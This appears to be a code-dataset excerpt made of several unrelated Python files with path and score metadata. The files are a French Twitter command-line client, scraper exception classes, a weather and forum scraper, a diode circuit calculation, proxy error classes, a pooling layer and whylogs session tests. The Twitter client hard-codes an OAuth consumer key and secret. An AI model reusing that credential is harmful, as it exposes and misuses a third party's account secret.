if option in ("-s", "--search"):
# Rechercher un motif dans la base des tweets
checkdb()
printout(_(u"Recherche de {0} dans vos anciens tweets...")
.format(value.decode('utf-8')), YELLOW)
print("\n")
# la méthode search retourne un tuple avec les champs
# qui contiennent le motif
db = cltwitdb(__dblocation__, __tablename__)
results = db.search(value, "tweet")
for result in results:
print((u"{0} -> {1}\n{2}\n\n").format(result[1].decode('utf-8'), result[4].decode('utf-8'), result[2].decode('utf-8')))
if option in ("-u", "--unfollow"):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Créer les liste friend et followers (par id)
friend_id, follower_id = get_friends_followers(api)
# Création des listes follow et unfollow
follow_liste = get_diff(follower_id, friend_id)
unfollow_liste = get_diff(friend_id, follower_id)
# Un-follow
printout(_("Vous suivez {0} personnes qui ne vous suivent pas.")
.format(len(unfollow_liste)), YELLOW)
print("\n")
printout(_("Voulez changer cela ? (o/N)"), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
for user in unfollow_liste:
printout(_("Voulez-vous cesser de suivre {0} ? (o/N)")
.format(api.get_user(user).screen_name), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
unfollow_user(api, user)
if option in ("-f", "--follow"):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Créer les liste friend et followers (par id)
friend_id, follower_id = get_friends_followers(api)
# Création des listes follow et unfollow
follow_liste = get_diff(follower_id, friend_id)
unfollow_liste = get_diff(friend_id, follower_id)
# follow
printout(_("{0} personnes vous suivent alors que vous ne les suivez pas.")
.format(len(follow_liste)), YELLOW)
print("\n")
printout(_("Voulez changer cela ? (o/N)"), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
for user in follow_liste:
printout(_("Voulez-vous suivre {0} ? (o/N)"
.format(api.get_user(user).screen_name)), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
follow_users(api, user)
if option in ("-t", "--tweet"):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Envoyer un tweet
tweet_size = len(re.sub("https://\S*", "X"*23, re.sub("http://\S*", "X"*22, value)))
if tweet_size < 141:
api.update_status(value)
print("\n")
printout(_(u"Tweet envoyé !"), GREEN)
else:
printout(_(u"La limite pour un tweet est de 140 caractères, votre message \
fait {0} caractères de trop").format(str(tweet_size - 140).decode('utf-8')), RED)
sys.exit()
if option in ("-h", "--help"):
help()
def help():
printout(_(u"""
Usage :
cltwit [OPTIONS]
Options :
-f (--follow)
*Ajouter des personnes qui vous suivent et que vous ne suivez pas
-u (--unfollow)
*Cesser de suivre les personnes que vous suivez et qui \
vous ne suivent pas
-s (--search) MOTIF
*Search ( rechercher MOTIF dans vos anciens tweets)
-t (--tweet)
*Envoyer un tweet (message de 140 caractères maximum)
-o (--output) FILENAME.csv
*Exporter l'intégralité de vos tweets dans \
le fichier FILENAME.csv
-a (--api)
* Obtenir des informations sur l'utilisation de l'api twitter
-r (--report) FILENAME.pdf
* Générer un reporting format pdf avec la repartition des tweets par année et par mois
-d (--database) c|u
c (create)
*Créer ou récréer la base de données des tweets
u (update)
*Mettre à jour la base de données des tweets
"""), BLUE
)
if __name__ == "__main__":
try:
sys.exit(main())
except KeyboardInterrupt:
print("\n")
print(_(u"Merci d'avoir utilisé clitwit !"))
| <filename>cltwit/main.py
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Cltwit is a command line twitter utility
Author : <NAME>
Date : 2013
"""
import os
import sys
import re
import getopt
import gettext
import sqlite3
import webbrowser
import ConfigParser
from sqlite2csv import sqlite2csv
from cltwitdb import cltwitdb
from utils import LocalTimezone
from cltwitreport import TweetsReport
APP_NAME = 'cltwit'
LOC_PATH = os.path.dirname(__file__) + '/locale'
gettext.find(APP_NAME, LOC_PATH)
gettext.install(APP_NAME, LOC_PATH, True)
try:
import tweepy
except ImportError:
print(_("Veuillez installer tweetpy https://github.com/tweepy/tweepy"))
sys.exit()
# Répertoire pour conf et bdd
__cltwitdir__ = os.path.expanduser("~/.config/cltwit")
# Fichier de configuration
__configfile__ = __cltwitdir__ + "/cltwit.conf"
# base de données et table sqlite
__dblocation__ = __cltwitdir__ + '/data.db'
__tablename__ = 'twitter'
__Local__ = LocalTimezone()
# gestion des couleurs sur le terminal
BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
def has_colours(stream):
"""Vérifier la prise en charge des couleurs par le terminal"""
if not hasattr(stream, "isatty"):
return False
if not stream.isatty():
return False # couleurs auto sur un TTY
try:
import curses
curses.setupterm()
return curses.tigetnum("colors") > 2
except:
# Si erreur on suppose false
return False
__has_colours__ = has_colours(sys.stdout)
def printout(text, colour=WHITE):
"""Print en couleur"""
if __has_colours__:
seq = "\x1b[1;%dm" % (30 + colour) + text + "\x1b[0m"
sys.stdout.write(seq)
else:
sys.stdout.write(text.encode("Utf-8"))
def checkdb():
""" Vérifier la présence de la bdd sqlite et la créer si absente """
if (not os.path.exists(__dblocation__)):
printout(_(u"Vous devez d'abord lancer la commande --database create \
pour créer une base de données de vos tweets."), RED)
sys.exit()
def checkconfig():
"""Récupérer la configuration ou la créer"""
# On ouvre le fichier de conf
config = ConfigParser.RawConfigParser()
try:
config.read(__configfile__)
if config.has_option('twitterapi', 'access_token'):
access_token = config.get('twitterapi', 'access_token')
if config.has_option('twitterapi', 'access_password'):
access_password = config.get('twitterapi', 'access_password')
except:
pass
auth = tweepy.OAuthHandler("Jus1rnqM6S0WojJfOH1kQ",
"AHQ5sTC8YYArHilXmqnsstOivY6ygQ2N27L1zBwk")
# Si aucune conf , autorisation de connexion à twitter via OAuth
if not(config.has_option('twitterapi', 'access_token') and
config.has_option('twitterapi', 'access_password')):
# On ouvre le navigateur web pour récupếrer le numéro d'autorisation
while True:
try:
webbrowser.open(auth.get_authorization_url())
var = raw_input(_("Entrez le token !\n"))
auth.get_access_token(var)
except Exception, e:
print(str(e))
continue
break
var = auth.access_token
# On récupère le token et le password
access_password = str(var).split("&")[0].split("=")[1]
access_token = str(var).split("&")[1].split("=")[1]
# écrire le fichier de conf avec les informations récupérées
try:
cfgfile = open(__configfile__, 'w')
if not(config.has_section('twitterapi')):
config.add_section('twitterapi')
config.set('twitterapi', 'access_token', access_token)
config.set('twitterapi', 'access_password', access_password)
config.write(cfgfile)
except IOError:
pass
finally:
cfgfile.close()
else: # Si un fichier de conf existait déjà
auth.set_access_token(access_token, access_password)
return auth
def login():
""" Se connecter à l'api twitter via tweepy """
auth = checkconfig()
api = tweepy.API(auth)
# On vérifie la connexion à l'api en récupérant le user name
try:
twittername = api.me().screen_name
except Exception, e:
if 'Unable to get username' in (str(e)):
printout(_(u"Impossible de s'authentifier avec l'api Twitter.\
Fonctionne en mode déconnecté"), RED)
print("\n")
twittername = "offline_mode"
printout(_(u"Authentifié avec le user twitter {0}").format(twittername.decode('utf-8')), GREEN)
print("\n")
return api, auth, twittername
def get_friends_followers(api):
"""Renvoie la liste des id des friends et followers"""
friend_id = []
follower_id = []
printout(_(u"Récupération des Followers..."), YELLOW)
print("\n")
for follower in tweepy.Cursor(api.followers).items():
follower_id.append(follower.id)
printout((u"Récupération des Friends..."), YELLOW)
print("\n")
for friend in tweepy.Cursor(api.friends).items():
friend_id.append(friend.id)
return friend_id, follower_id
def get_diff(liste1, liste2):
"""Renvoie les objets de liste1 qui ne sont pas dans liste2"""
return list(set(liste1).difference(set(liste2)))
def follow_users(api, user):
"""Suivre une personne"""
try:
api.create_friendship(user)
printout(_(u"Vous suivez maintenant {0}").format(api.get_user(user).screen_name.decode('utf-8')), GREEN)
except Exception, e:
print(e)
def unfollow_user(api, user):
"""Cesser de suivre une personne"""
try:
api.destroy_friendship(user)
printout(_(u"Vous ne suivez plus {0}").format(api.get_user(user).screen_name.decode('utf-8')), GREEN)
except Exception, e:
print(e)
def main(argv=None):
""" Point d'entrée """
# Si le répertoire pour la conf et la base de données n'existe pas le créer
if not os.path.exists(__cltwitdir__):
os.makedirs(__cltwitdir__)
#~ twittername = "offline_mode"
# Traitement des arguments
if argv is None:
argv = sys.argv
if len(argv) == 1:
help()
try:
opts, args = getopt.getopt(sys.argv[1:], "r:ahfut:o:s:d:",
["report", "api", "help", "follow", "unfollow", "tweet=", "output=", "search=", "database="])
except getopt.GetoptError, err:
print(err)
help()
sys.exit()
# traitement des options
for option, value in opts:
if option in ('-a', '--api'):
api, auth, twittername = login()
res = api.rate_limit_status()
rtime = res['reset_time']
rhits = res['remaining_hits']
hlimit = res['hourly_limit']
from dateutil.parser import parse
drtime = parse(rtime)
printout(_("Informations sur l'utilisation de l'api Twitter"), YELLOW)
print("\n")
# Définir l'heure locale qui correspond à l'heure renvoyée
# par l'api Twitter
rlocaltime = drtime.astimezone(__Local__)
printout(_("Maximum d'appels par heure: "), BLUE)
print hlimit
printout(_("Nombre d'appels restants: "), BLUE)
print rhits
printout(_("Heure du prochain reset: "), BLUE)
print rlocaltime.strftime("%H:%M %Y-%m-%d")
if option in ('-r', '--report'):
api, auth, twittername = login()
checkdb()
conn = sqlite3.connect(__dblocation__)
c = conn.cursor()
c.execute("select substr(date, 1,4) from twitter order by date asc limit 1")
dmois = c.fetchone()[0]
c.execute("select substr(date, 1,4) from twitter order by date desc limit 1")
fmois = c.fetchone()[0]
# Requête des données à exporter
dd = dict()
for a in range(int(dmois), int(fmois) + 1):
result = []
for m in range(1, 13):
mois = ('{num:02d}'.format(num=m))
c.execute("select count(*) from twitter where substr(date, 1,4) = '{0}' and substr(date, 6,2) = '{1}'".format(a, mois))
result.append(c.fetchone()[0])
dd[a] = result
c.close()
conn.close()
treport = TweetsReport(value)
# twittername = "offline"
treport.ecrireTitre(twittername)
nb = 0
for annee, donnees in dd.items():
nb += 1
if nb == 4:
treport.NextPage()
nb = 1
saut = 0
if nb == 1:
saut = 0
if nb == 2:
saut = 200
if nb == 3:
saut = 400
treport.ecrireLegende(saut, annee, donnees)
treport.addPie(saut, donnees)
treport.save()
printout(_(u"Report {0} créé !").format(value), GREEN)
print("\n")
sys.exit(0)
if option in ('-d', '--database'):
if value in ('u', 'update'):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Mettre à jour la base de données
db = cltwitdb(__dblocation__, __tablename__)
printout(_(u"Mise à jour de la base de données de {0}").format(twittername.decode('utf-8')), YELLOW)
print("\n")
nb = db.update(api, twittername)
printout(_(u"Ajout de {0} tweet(s) dans la base de données.").format(nb), GREEN)
if value in ('c', 'create'):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Créer la base de données
db = cltwitdb(__dblocation__, __tablename__)
printout(_(u"Création de la liste des tweets de ") + twittername.decode('utf-8'), YELLOW)
db.create(api, twittername)
printout(_(u"Base de données crée"), GREEN)
sys.exit()
#~ database_create(api,twittername)
if option in ("-o", "--output"):
# Exporter en csv
checkdb()
conn = sqlite3.connect(__dblocation__)
c = conn.cursor()
# Requête des données à exporter
c.execute('select date, tweet, url from {0} order by date desc'.format(__tablename__))
# On appelle la classe sqlite2csv qui se charge de l'export
export = sqlite2csv(open(value, "wb"))
# Entête du fichier csv
export.writerow(["Date", "Tweet", "URL"])
# Lignes du fichier csv
export.writerows(c)
# On ferme la connexion sqlite et le curseur
c.close()
conn.close()
printout(_(u"Fichier csv {0} créé.").format(value.decode('utf-8')), GREEN)
sys.exit()
if option in ("-s", "--search"):
# Rechercher un motif dans la base des tweets
checkdb()
printout(_(u"Recherche de {0} dans vos anciens tweets...")
.format(value.decode('utf-8')), YELLOW)
print("\n")
# la méthode search retourne un tuple avec les champs
# qui contiennent le motif
db = cltwitdb(__dblocation__, __tablename__)
results = db.search(value, "tweet")
for result in results:
print((u"{0} -> {1}\n{2}\n\n").format(result[1].decode('utf-8'), result[4].decode('utf-8'), result[2].decode('utf-8')))
if option in ("-u", "--unfollow"):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Créer les liste friend et followers (par id)
friend_id, follower_id = get_friends_followers(api)
# Création des listes follow et unfollow
follow_liste = get_diff(follower_id, friend_id)
unfollow_liste = get_diff(friend_id, follower_id)
# Un-follow
printout(_("Vous suivez {0} personnes qui ne vous suivent pas.")
.format(len(unfollow_liste)), YELLOW)
print("\n")
printout(_("Voulez changer cela ? (o/N)"), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
for user in unfollow_liste:
printout(_("Voulez-vous cesser de suivre {0} ? (o/N)")
.format(api.get_user(user).screen_name), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
unfollow_user(api, user)
if option in ("-f", "--follow"):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Créer les liste friend et followers (par id)
friend_id, follower_id = get_friends_followers(api)
# Création des listes follow et unfollow
follow_liste = get_diff(follower_id, friend_id)
unfollow_liste = get_diff(friend_id, follower_id)
# follow
printout(_("{0} personnes vous suivent alors que vous ne les suivez pas.")
.format(len(follow_liste)), YELLOW)
print("\n")
printout(_("Voulez changer cela ? (o/N)"), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
for user in follow_liste:
printout(_("Voulez-vous suivre {0} ? (o/N)"
.format(api.get_user(user).screen_name)), BLUE)
print("\n")
reponse = raw_input("> ")
if (reponse.lower() == 'o' or reponse.lower() == 'y'):
follow_users(api, user)
if option in ("-t", "--tweet"):
# Se connecter à l'api twitter
api, auth, twittername = login()
# Envoyer un tweet
tweet_size = len(re.sub("https://\S*", "X"*23, re.sub("http://\S*", "X"*22, value)))
if tweet_size < 141:
api.update_status(value)
print("\n")
printout(_(u"Tweet envoyé !"), GREEN)
else:
printout(_(u"La limite pour un tweet est de 140 caractères, votre message \
fait {0} caractères de trop").format(str(tweet_size - 140).decode('utf-8')), RED)
sys.exit()
if option in ("-h", "--help"):
help()
def help():
printout(_(u"""
Usage :
cltwit [OPTIONS]
Options :
-f (--follow)
*Ajouter des personnes qui vous suivent et que vous ne suivez pas
-u (--unfollow)
*Cesser de suivre les personnes que vous suivez et qui \
vous ne suivent pas
-s (--search) MOTIF
*Search ( rechercher MOTIF dans vos anciens tweets)
-t (--tweet)
*Envoyer un tweet (message de 140 caractères maximum)
-o (--output) FILENAME.csv
*Exporter l'intégralité de vos tweets dans \
le fichier FILENAME.csv
-a (--api)
* Obtenir des informations sur l'utilisation de l'api twitter
-r (--report) FILENAME.pdf
* Générer un reporting format pdf avec la repartition des tweets par année et par mois
-d (--database) c|u
c (create)
*Créer ou récréer la base de données des tweets
u (update)
*Mettre à jour la base de données des tweets
"""), BLUE
)
if __name__ == "__main__":
try:
sys.exit(main())
except KeyboardInterrupt:
print("\n")
print(_(u"Merci d'avoir utilisé clitwit !"))
| fr | 0.977159 | #!/usr/bin/env python2 # -*- coding: utf-8 -*- Cltwit is a command line twitter utility Author : <NAME> Date : 2013 # Répertoire pour conf et bdd # Fichier de configuration # base de données et table sqlite # gestion des couleurs sur le terminal Vérifier la prise en charge des couleurs par le terminal # couleurs auto sur un TTY # Si erreur on suppose false Print en couleur Vérifier la présence de la bdd sqlite et la créer si absente Récupérer la configuration ou la créer # On ouvre le fichier de conf # Si aucune conf , autorisation de connexion à twitter via OAuth # On ouvre le navigateur web pour récupếrer le numéro d'autorisation # On récupère le token et le password # écrire le fichier de conf avec les informations récupérées # Si un fichier de conf existait déjà Se connecter à l'api twitter via tweepy # On vérifie la connexion à l'api en récupérant le user name Renvoie la liste des id des friends et followers Renvoie les objets de liste1 qui ne sont pas dans liste2 Suivre une personne Cesser de suivre une personne Point d'entrée # Si le répertoire pour la conf et la base de données n'existe pas le créer #~ twittername = "offline_mode" # Traitement des arguments # traitement des options # Définir l'heure locale qui correspond à l'heure renvoyée # par l'api Twitter # Requête des données à exporter # twittername = "offline" # Se connecter à l'api twitter # Mettre à jour la base de données # Se connecter à l'api twitter # Créer la base de données #~ database_create(api,twittername) # Exporter en csv # Requête des données à exporter # On appelle la classe sqlite2csv qui se charge de l'export # Entête du fichier csv # Lignes du fichier csv # On ferme la connexion sqlite et le curseur # Rechercher un motif dans la base des tweets # la méthode search retourne un tuple avec les champs # qui contiennent le motif # Se connecter à l'api twitter # Créer les liste friend et followers (par id) # Création des listes follow et unfollow # Un-follow # Se connecter à l'api twitter # Créer les liste friend et followers (par id) # Création des listes follow et unfollow # follow # Se connecter à l'api twitter # Envoyer un tweet Usage : cltwit [OPTIONS] Options : -f (--follow) *Ajouter des personnes qui vous suivent et que vous ne suivez pas -u (--unfollow) *Cesser de suivre les personnes que vous suivez et qui \ vous ne suivent pas -s (--search) MOTIF *Search ( rechercher MOTIF dans vos anciens tweets) -t (--tweet) *Envoyer un tweet (message de 140 caractères maximum) -o (--output) FILENAME.csv *Exporter l'intégralité de vos tweets dans \ le fichier FILENAME.csv -a (--api) * Obtenir des informations sur l'utilisation de l'api twitter -r (--report) FILENAME.pdf * Générer un reporting format pdf avec la repartition des tweets par année et par mois -d (--database) c|u c (create) *Créer ou récréer la base de données des tweets u (update) *Mettre à jour la base de données des tweets | 2.597198 | 3 |
weibo_image_spider/exceptions.py | lonsty/weibo-pic-spider-hd | 0 | 8528 | # @AUTHOR : lonsty
# @DATE : 2020/3/28 18:01
class CookiesExpiredException(Exception):
pass
class NoImagesException(Exception):
pass
class ContentParserError(Exception):
pass
class UserNotFound(Exception):
pass
| # @AUTHOR : lonsty
# @DATE : 2020/3/28 18:01
class CookiesExpiredException(Exception):
pass
class NoImagesException(Exception):
pass
class ContentParserError(Exception):
pass
class UserNotFound(Exception):
pass
| en | 0.341225 | # @AUTHOR : lonsty # @DATE : 2020/3/28 18:01 | 1.490781 | 1 |
WebHtmlExample/WebHtmlExample.py | lilei644/python-learning-example | 2 | 8529 | <reponame>lilei644/python-learning-example
import requests
from bs4 import BeautifulSoup
import re
# 设置请求头
# 更换一下爬虫的User-Agent,这是最常规的爬虫设置
headers = {
"User-Agent": 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'}
# 获取天气信息
def get_weather():
html = requests.get("http://www.weather.com.cn/weather/101280601.shtml", headers=headers)
html.encoding = "utf-8"
if html.status_code == 200:
soup = BeautifulSoup(html.text, "lxml")
light_list = soup.select('p.tem span')
night_list = soup.select('p.tem i')
for index in range(0, len(light_list)):
print('白天温度:{0}, 夜晚温度:{1}'.format(light_list[index].get_text(), night_list[index].get_text()))
# 获取贴吧回复数
def get_bar():
html = requests.get("http://tieba.baidu.com/f?ie=utf-8&kw=python3", headers=headers)
html.encoding = "utf-8"
if html.status_code == 200:
# <span class="threadlist_rep_num center_text" title="回复">9</span>
tag_list = re.findall(r'(?<="回复">)\d*(?=</span>)', html.text)
print(tag_list)
if __name__ == '__main__':
get_weather()
get_bar()
| import requests
from bs4 import BeautifulSoup
import re
# 设置请求头
# 更换一下爬虫的User-Agent,这是最常规的爬虫设置
headers = {
"User-Agent": 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'}
# 获取天气信息
def get_weather():
html = requests.get("http://www.weather.com.cn/weather/101280601.shtml", headers=headers)
html.encoding = "utf-8"
if html.status_code == 200:
soup = BeautifulSoup(html.text, "lxml")
light_list = soup.select('p.tem span')
night_list = soup.select('p.tem i')
for index in range(0, len(light_list)):
print('白天温度:{0}, 夜晚温度:{1}'.format(light_list[index].get_text(), night_list[index].get_text()))
# 获取贴吧回复数
def get_bar():
html = requests.get("http://tieba.baidu.com/f?ie=utf-8&kw=python3", headers=headers)
html.encoding = "utf-8"
if html.status_code == 200:
# <span class="threadlist_rep_num center_text" title="回复">9</span>
tag_list = re.findall(r'(?<="回复">)\d*(?=</span>)', html.text)
print(tag_list)
if __name__ == '__main__':
get_weather()
get_bar() | zh | 0.418808 | # 设置请求头 # 更换一下爬虫的User-Agent,这是最常规的爬虫设置 # 获取天气信息 # 获取贴吧回复数 # <span class="threadlist_rep_num center_text" title="回复">9</span> | 3.231842 | 3 |
Codi/diode.py | JosepFanals/HELM | 1 | 8530 | import numpy as np
import math
import matplotlib.pyplot as plt
U = 5 # equival a l'E
R = 2 # equival a R1
R2 = 3
P = 1.2
Vt = 0.026
Is = 0.000005
n = 200 # profunditat
Vd = np.zeros(n) # sèries
Vl = np.zeros(n)
I1 = np.zeros(n)
I1[0] = U / R # inicialització de les sèries
Vd[0] = Vt * math.log(1 + I1[0] / Is)
Vl[0] = P / I1[0]
def convVd(Vd, I, i): # convolució pel càlcul de Vd[i]
suma = 0
for k in range(1, i):
suma += k * Vd[k] * I[i - k]
return suma
def convVlI(Vl, I1, i): # convolució pel càlcul de Vl[i]
suma = 0
for k in range(i):
suma = suma + Vl[k] * I1[i - k]
return suma
for i in range(1, n): # càlcul dels coeficients
I1[i] = (1 / R + 1 / R2) * (-Vd[i - 1] - Vl[i - 1])
Vd[i] = (i * Vt * I1[i] - convVd(Vd, I1, i)) / (i * (Is + I1[0]))
Vl[i] = -convVlI(Vl, I1, i) / I1[0]
If = sum(I1)
Vdf = sum(Vd)
Vlf = sum(Vl)
print('I1: ' + str(If))
print('Vd: ' + str(Vdf))
print('Vl: ' + str(Vlf))
print('P: ' + str(Vlf * If))
Vdfinal = np.zeros(n) # per tal de veure com evoluciona la tensió del díode
for j in range(n):
Vdfinal[j] = np.sum([Vd[:(j+1)]])
print(Vdfinal)
| import numpy as np
import math
import matplotlib.pyplot as plt
U = 5 # equival a l'E
R = 2 # equival a R1
R2 = 3
P = 1.2
Vt = 0.026
Is = 0.000005
n = 200 # profunditat
Vd = np.zeros(n) # sèries
Vl = np.zeros(n)
I1 = np.zeros(n)
I1[0] = U / R # inicialització de les sèries
Vd[0] = Vt * math.log(1 + I1[0] / Is)
Vl[0] = P / I1[0]
def convVd(Vd, I, i): # convolució pel càlcul de Vd[i]
suma = 0
for k in range(1, i):
suma += k * Vd[k] * I[i - k]
return suma
def convVlI(Vl, I1, i): # convolució pel càlcul de Vl[i]
suma = 0
for k in range(i):
suma = suma + Vl[k] * I1[i - k]
return suma
for i in range(1, n): # càlcul dels coeficients
I1[i] = (1 / R + 1 / R2) * (-Vd[i - 1] - Vl[i - 1])
Vd[i] = (i * Vt * I1[i] - convVd(Vd, I1, i)) / (i * (Is + I1[0]))
Vl[i] = -convVlI(Vl, I1, i) / I1[0]
If = sum(I1)
Vdf = sum(Vd)
Vlf = sum(Vl)
print('I1: ' + str(If))
print('Vd: ' + str(Vdf))
print('Vl: ' + str(Vlf))
print('P: ' + str(Vlf * If))
Vdfinal = np.zeros(n) # per tal de veure com evoluciona la tensió del díode
for j in range(n):
Vdfinal[j] = np.sum([Vd[:(j+1)]])
print(Vdfinal)
| ca | 0.997665 | # equival a l'E # equival a R1 # profunditat # sèries # inicialització de les sèries # convolució pel càlcul de Vd[i] # convolució pel càlcul de Vl[i] # càlcul dels coeficients # per tal de veure com evoluciona la tensió del díode | 2.925153 | 3 |
proxybroker/errors.py | aljeshishe/ProxyBroker | 0 | 8531 | <filename>proxybroker/errors.py
"""Errors."""
class ProxyError(Exception):
pass
class NoProxyError(Exception):
pass
class ResolveError(Exception):
pass
class ProxyConnError(ProxyError):
pass
class ProxyRecvError(ProxyError): # connection_is_reset
pass
class ProxySendError(ProxyError): # connection_is_reset
pass
class ProxyTimeoutError(ProxyError):
pass
class ProxyEmptyResponseError(ProxyError):
pass
class BadStatusError(Exception): # BadStatusLine
pass
class BadResponseError(Exception):
pass
class BadStatusLine(Exception):
pass
class ErrorOnStream(Exception):
pass
| <filename>proxybroker/errors.py
"""Errors."""
class ProxyError(Exception):
pass
class NoProxyError(Exception):
pass
class ResolveError(Exception):
pass
class ProxyConnError(ProxyError):
pass
class ProxyRecvError(ProxyError): # connection_is_reset
pass
class ProxySendError(ProxyError): # connection_is_reset
pass
class ProxyTimeoutError(ProxyError):
pass
class ProxyEmptyResponseError(ProxyError):
pass
class BadStatusError(Exception): # BadStatusLine
pass
class BadResponseError(Exception):
pass
class BadStatusLine(Exception):
pass
class ErrorOnStream(Exception):
pass
| en | 0.415832 | Errors. # connection_is_reset # connection_is_reset # BadStatusLine | 2.126809 | 2 |
questionanswering/models/pooling.py | lvying1991/KBQA-System | 2 | 8532 | <filename>questionanswering/models/pooling.py
import torch
from torch import nn as nn
from torch import autograd
class LogSumExpPooling1d(nn.Module):
"""Applies a 1D LogSumExp pooling over an input signal composed of several input planes.
LogSumExp is a smooth approximation of the max function.
在由多个输入平面组成的输入信号上应用1D LogSumExp池。
LogSumExp是max函数的平滑近似值。
Examples:
>>> m = LogSumExpPooling1d()
>>> input = autograd.Variable(torch.randn(4, 5, 10))
>>> m(input).squeeze()
"""
def __init__(self):
super(LogSumExpPooling1d, self).__init__()
def forward(self, x):
x.exp_()
x = x.sum(dim=-1, keepdim=True)
x.log_()
return x
def __repr__(self):
return self.__class__.__name__ + '()'
| <filename>questionanswering/models/pooling.py
import torch
from torch import nn as nn
from torch import autograd
class LogSumExpPooling1d(nn.Module):
"""Applies a 1D LogSumExp pooling over an input signal composed of several input planes.
LogSumExp is a smooth approximation of the max function.
在由多个输入平面组成的输入信号上应用1D LogSumExp池。
LogSumExp是max函数的平滑近似值。
Examples:
>>> m = LogSumExpPooling1d()
>>> input = autograd.Variable(torch.randn(4, 5, 10))
>>> m(input).squeeze()
"""
def __init__(self):
super(LogSumExpPooling1d, self).__init__()
def forward(self, x):
x.exp_()
x = x.sum(dim=-1, keepdim=True)
x.log_()
return x
def __repr__(self):
return self.__class__.__name__ + '()'
| en | 0.44666 | Applies a 1D LogSumExp pooling over an input signal composed of several input planes. LogSumExp is a smooth approximation of the max function. 在由多个输入平面组成的输入信号上应用1D LogSumExp池。 LogSumExp是max函数的平滑近似值。 Examples: >>> m = LogSumExpPooling1d() >>> input = autograd.Variable(torch.randn(4, 5, 10)) >>> m(input).squeeze() | 3.162076 | 3 |
tests/unit/app/test_session.py | bernease/whylogs-python | 0 | 8533 | <reponame>bernease/whylogs-python
import pytest
from whylogs.app.session import get_or_create_session, get_session, get_logger, reset_default_session, session_from_config
from whylogs.app.config import SessionConfig
from whylogs.app.session import Session
from pandas import util
def test_get_global_session():
_session = None
session = get_or_create_session()
global_session = get_session()
assert session == global_session
def test_reset():
session = get_or_create_session()
reset_default_session()
global_session = get_session()
assert global_session.project is not None
def test_session_log_dataframe():
_session = None
session = session_from_config(SessionConfig(
"default-project", "default-pipeline", [], False
))
df = util.testing.makeDataFrame()
profile = session.log_dataframe(df)
assert session.logger() is not None
assert session.logger("default-project").dataset_name == "default-project"
def test_session_profile():
session = session_from_config(SessionConfig(
"default-project", "default-pipeline", [], False
))
df = util.testing.makeDataFrame()
profile = session.log_dataframe(df)
assert profile is not None
summary = profile.flat_summary()
flat_summary = summary['summary']
assert len(flat_summary) == 4
def test_profile_df():
session = get_or_create_session()
df = util.testing.makeDataFrame()
log_profile = session.log_dataframe(df)
profile = session.profile_dataframe(df)
assert log_profile.name == profile.name
assert log_profile.dataset_timestamp == profile.dataset_timestamp
assert log_profile.session_timestamp == profile.session_timestamp
assert len(profile.columns) == 4
assert len(log_profile.tags) == 1
assert len(profile.tags) == 2
def test_close_session():
session = get_or_create_session()
session.close()
assert session.is_active() == False
df = util.testing.makeDataFrame()
log_profile = session.log_dataframe(df)
assert log_profile == None
profile = session.profile_dataframe(df)
assert profile == None
profile = session.new_profile(df)
assert profile == None
with pytest.raises(RuntimeError):
session.logger()
def test_logger_cache():
_session = None
session = get_or_create_session()
with session.logger("cache-test", with_rotation_time="s") as logger:
logger.log({"name": 1})
session.close()
def test_remove_logger():
session = get_or_create_session()
session.logger("default-project")
with pytest.raises(KeyError):
session.remove_logger("test")
| import pytest
from whylogs.app.session import get_or_create_session, get_session, get_logger, reset_default_session, session_from_config
from whylogs.app.config import SessionConfig
from whylogs.app.session import Session
from pandas import util
def test_get_global_session():
_session = None
session = get_or_create_session()
global_session = get_session()
assert session == global_session
def test_reset():
session = get_or_create_session()
reset_default_session()
global_session = get_session()
assert global_session.project is not None
def test_session_log_dataframe():
_session = None
session = session_from_config(SessionConfig(
"default-project", "default-pipeline", [], False
))
df = util.testing.makeDataFrame()
profile = session.log_dataframe(df)
assert session.logger() is not None
assert session.logger("default-project").dataset_name == "default-project"
def test_session_profile():
session = session_from_config(SessionConfig(
"default-project", "default-pipeline", [], False
))
df = util.testing.makeDataFrame()
profile = session.log_dataframe(df)
assert profile is not None
summary = profile.flat_summary()
flat_summary = summary['summary']
assert len(flat_summary) == 4
def test_profile_df():
session = get_or_create_session()
df = util.testing.makeDataFrame()
log_profile = session.log_dataframe(df)
profile = session.profile_dataframe(df)
assert log_profile.name == profile.name
assert log_profile.dataset_timestamp == profile.dataset_timestamp
assert log_profile.session_timestamp == profile.session_timestamp
assert len(profile.columns) == 4
assert len(log_profile.tags) == 1
assert len(profile.tags) == 2
def test_close_session():
session = get_or_create_session()
session.close()
assert session.is_active() == False
df = util.testing.makeDataFrame()
log_profile = session.log_dataframe(df)
assert log_profile == None
profile = session.profile_dataframe(df)
assert profile == None
profile = session.new_profile(df)
assert profile == None
with pytest.raises(RuntimeError):
session.logger()
def test_logger_cache():
_session = None
session = get_or_create_session()
with session.logger("cache-test", with_rotation_time="s") as logger:
logger.log({"name": 1})
session.close()
def test_remove_logger():
session = get_or_create_session()
session.logger("default-project")
with pytest.raises(KeyError):
session.remove_logger("test") | none | 1 | 2.401841 | 2 |
|
